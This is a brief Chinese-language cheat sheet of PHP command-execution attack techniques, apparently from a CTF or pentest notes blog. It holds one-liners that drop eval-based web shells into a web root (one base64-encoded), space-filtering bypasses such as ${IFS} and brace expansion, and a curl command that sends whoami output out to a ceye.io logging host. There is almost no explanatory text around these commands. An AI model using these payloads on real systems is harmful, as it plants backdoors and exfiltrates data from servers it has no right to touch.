php代码执行&命令执行
getshell
echo PD9waHAgZXZhbCgkX1BPU1Rbd2hvYW1pXSk7Pz4=|base64 -d > /var/www/html/shell.php
echo \<\?php eval\(\@\$_POST\[1\]\)\; \?\> >1.php
bypass
绕过空格
> < <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09
外带
curl xxxx.ceye.io/`whoami`
参考
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容